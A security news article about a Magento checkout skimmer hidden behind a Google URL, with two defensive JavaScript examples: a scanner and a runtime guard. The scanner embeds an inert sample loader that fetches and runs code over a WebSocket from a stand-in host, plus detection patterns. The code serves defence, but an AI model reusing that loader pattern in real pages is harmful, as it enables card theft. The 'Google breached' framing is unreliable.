Google Used to Spread Malware via Complex Scripts

Google’s security has been breached, and hackers are using it to spread malware. This new malware starts with a script hidden on e-commerce websites that use Magento. The script references a legitimate Google URL, making it seem harmless. The problem is that the hackers have crafted the URL’s parameters so that they decode and run JavaScript code.

This code is sneaky because it is served from Google’s domain, which makes it appear trustworthy. Most security controls, such as Content Security Policies or DNS filters, let it pass without raising any alarms. The script doesn’t run unconditionally, though. It only kicks in under certain conditions, such as when it detects an automated browser or when the page URL contains the word “Checkout”, which marks a payment page.

When that happens, the malware opens a covert WebSocket connection to the hacker’s server. This lets the hackers adjust the malware’s behavior to fit the user’s actions. The payload arrives Base64-encoded, is decoded, and is run dynamically through JavaScript’s Function constructor, which lets the hackers execute new code in the browser in real time.
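The loader pattern described above can be checked for statically in page source before it ever runs. The following Node.js scanner is an added example, not code from the article or from any vendor: it pulls every `<script src>` out of an HTML document, decodes query parameters that look like Base64, and reports parameters whose decoded text shows the indicators the article lists (a WebSocket, the Function constructor, Base64 decoding, a “checkout” trigger, and an automation check). The host list, the placeholder endpoint path, the `webdriver` heuristic for automation detection, and the inert sample payload are all assumptions constructed for the demo.

```javascript
// Added example, not code from the article: a Node.js scanner for the loader
// pattern described above. It extracts <script src> URLs, decodes query
// parameters that look like base64, and reports decoded text that shows the
// indicators the article lists. Host names, paths and the sample payload are
// constructed for the demo.

// Hosts that a domain-reputation filter would wave through (assumption: a
// short list of Google-owned domains is enough for the demo).
const TRUSTED_LOOKING = /(^|\.)(google|googleapis|googleadservices|googleusercontent)\.com$/i;

// Indicators taken from the article's description of the payload. The
// "webdriver" check is an assumption about how automated browsers are detected.
const INDICATORS = [
  ["dynamic-code", /\b(Function|eval)\s*\(/],
  ["websocket", /\bWebSocket\b/],
  ["base64-decode", /\batob\s*\(/],
  ["checkout-trigger", /checkout/i],
  ["automation-check", /\bwebdriver\b/],
];

const BASE64ISH = /^[A-Za-z0-9+\/_-]{24,}={0,2}$/; // standard or URL-safe alphabet
const PRINTABLE = /^[\t\n\r\x20-\x7e]*$/;          // decoded text must be plain ASCII

// Return every src attribute of a <script> tag (a regex is enough for this demo).
function extractScriptSrcs(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Decode base64-looking query parameters; skip anything that is not plain text.
function decodeBase64Params(url) {
  const decoded = [];
  for (const [name, value] of url.searchParams) {
    if (!BASE64ISH.test(value)) continue;
    const text = Buffer.from(value, "base64").toString("utf8");
    if (text.length > 0 && PRINTABLE.test(text)) decoded.push({ name, text });
  }
  return decoded;
}

// Names of the indicators present in a piece of decoded text.
function matchIndicators(text) {
  return INDICATORS.filter(([, re]) => re.test(text)).map(([name]) => name);
}

// Scan a document; one finding per script whose decoded parameter looks like code.
function scanHtml(html, base = "https://shop.example/") {
  const findings = [];
  for (const src of extractScriptSrcs(html)) {
    let url;
    try { url = new URL(src, base); } catch (e) { continue; }
    for (const { name, text } of decodeBase64Params(url)) {
      const indicators = matchIndicators(text);
      if (indicators.length === 0) continue;
      findings.push({
        src,
        host: url.hostname,
        trustedLookingHost: TRUSTED_LOOKING.test(url.hostname),
        param: name,
        indicators,
      });
    }
  }
  return findings;
}

// Constructed, inert sample: the kind of text the article says the parameter
// decodes to. It is only scanned here, never executed.
const SAMPLE_PAYLOAD = [
  "if (navigator.webdriver) { return; }",
  "if (location.href.indexOf('checkout') !== -1) {",
  "  var ws = new WebSocket('wss://placeholder.invalid/');",
  "  ws.onmessage = function (m) { new Function(atob(m.data))(); };",
  "}",
].join("\n");

// Constructed page: one benign Google-hosted script, one first-party script,
// and one with the encoded parameter. The path is a placeholder; the article
// names no endpoint.
function buildSampleHtml() {
  const loader = new URL("https://www.google.com/placeholder/endpoint");
  loader.searchParams.set("q", Buffer.from(SAMPLE_PAYLOAD).toString("base64"));
  return [
    '<script src="https://www.google.com/recaptcha/api.js?render=site-key-placeholder"></script>',
    '<script src="/js/theme.js"></script>',
    `<script src="${loader.toString()}"></script>`,
  ].join("\n");
}

console.log(JSON.stringify(scanHtml(buildSampleHtml()), null, 2));
```

Running it prints a single finding for the placeholder endpoint, marked `trustedLookingHost: true`, with all five indicators; the reCAPTCHA script and the first-party script produce nothing. The check is deliberately narrow: a parameter that does not decode to readable JavaScript, or a loader that fetches its payload only after a WebSocket handshake, will not be caught this way, which is why the article treats static scanning as insufficient on its own.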

One reason this malware is so effective is that it can evade most leading antivirus programs, including those on Android and static malware scanners. The script’s logic is complex and only works under specific conditions, making it hard to detect.

So, how can you protect yourself? Currently, DNS-based filters and firewall rules offer limited protection because the initial request appears to be a legitimate connection to Google’s domain. In organizations, endpoint protection systems might struggle to detect the malware if they rely too heavily on the domain’s reputation or don’t inspect dynamic script execution in the browser.

Even with advanced analysis tools, average users are still at high risk. To reduce this risk, it’s a good idea to limit third-party scripts, use separate browser sessions for financial transactions, and be cautious of unexpected website behavior.
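The gap the article points at, tooling that never looks at dynamic script execution inside the browser, can be narrowed with an in-page monitor. The following is an added example, not code from the article or any product: a best-effort runtime guard that wraps the Function constructor and the WebSocket constructor on a global object, records every use, and flags WebSocket endpoints outside an allowlist. To run under Node it is exercised against a constructed fake window object with a stub WebSocket; `installGuard`, `makeFakeWindow`, the allowlist and the placeholder host names are all assumptions.

```javascript
// Added example, not from the article: a best-effort in-page monitor for the
// behaviour the article describes (dynamic code through the Function
// constructor plus an outbound WebSocket). In a real page it must be the
// first script to run; here it is demonstrated against a fake window object.

function installGuard(target, { allowedWsHosts = [], reportSink = console.warn } = {}) {
  const events = [];
  const allowed = new Set(allowedWsHosts);

  function record(kind, detail) {
    const event = { kind, detail, at: Date.now() };
    events.push(event);
    reportSink(`[guard] ${kind}: ${detail}`);
  }

  // The source body is always the last argument to Function(...).
  function bodyOf(args) {
    return args.length ? String(args[args.length - 1]).slice(0, 80) : "";
  }

  const OriginalFunction = target.Function;
  target.Function = new Proxy(OriginalFunction, {
    // `new Function(src)` lands in construct, a plain `Function(src)` call in apply.
    construct(Target, args) {
      record("dynamic-code", bodyOf(args));
      return Reflect.construct(Target, args);
    },
    apply(Target, thisArg, args) {
      record("dynamic-code", bodyOf(args));
      return Reflect.apply(Target, thisArg, args);
    },
  });

  const OriginalWebSocket = target.WebSocket;
  if (OriginalWebSocket) {
    target.WebSocket = new Proxy(OriginalWebSocket, {
      construct(Target, args) {
        const host = new URL(String(args[0])).hostname;
        record(allowed.has(host) ? "websocket-allowed" : "websocket-unexpected", host);
        return Reflect.construct(Target, args);
      },
    });
  }

  return {
    events,
    uninstall() {
      target.Function = OriginalFunction;
      target.WebSocket = OriginalWebSocket;
    },
  };
}

// Constructed stand-in for a browser window: the real Function constructor
// and a WebSocket stub that never opens a connection.
function makeFakeWindow() {
  class StubWebSocket {
    constructor(url) { this.url = url; this.readyState = 0; }
  }
  return { Function, WebSocket: StubWebSocket };
}

// Walk through legitimate use, then the pattern from the article, and return
// what the guard observed. Host names are placeholders.
function demo() {
  const win = makeFakeWindow();
  const guard = installGuard(win, {
    allowedWsHosts: ["chat.shop.example"],
    reportSink: () => {}, // silent for the demo; a real page would beacon these
  });

  // Legitimate page behaviour: a helper built with Function, a known chat socket.
  const add = new win.Function("a", "b", "return a + b");
  new win.WebSocket("wss://chat.shop.example/support");

  // The behaviour the article describes: decode a blob and run it, then open
  // a socket to a host that is not on the allowlist. The blob is harmless.
  const blob = Buffer.from("return 6 * 7").toString("base64");
  const result = win.Function(Buffer.from(blob, "base64").toString("utf8"))();
  new win.WebSocket("wss://placeholder.invalid/c2");

  guard.uninstall();
  return { sum: add(2, 3), result, events: guard.events };
}

console.log(JSON.stringify(demo().events, null, 2));
```

Wrapped constructors still work, so the guard does not break the page; it only records. The record for the unexpected socket is what a monitoring pipeline would alert on. Its limits follow directly from the article: the skimmer only fires on checkout pages and in real browsers, so the guard has to be deployed on exactly those pages, loaded before any third-party script, and it cannot see code that obtains a pristine `Function` from another realm.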
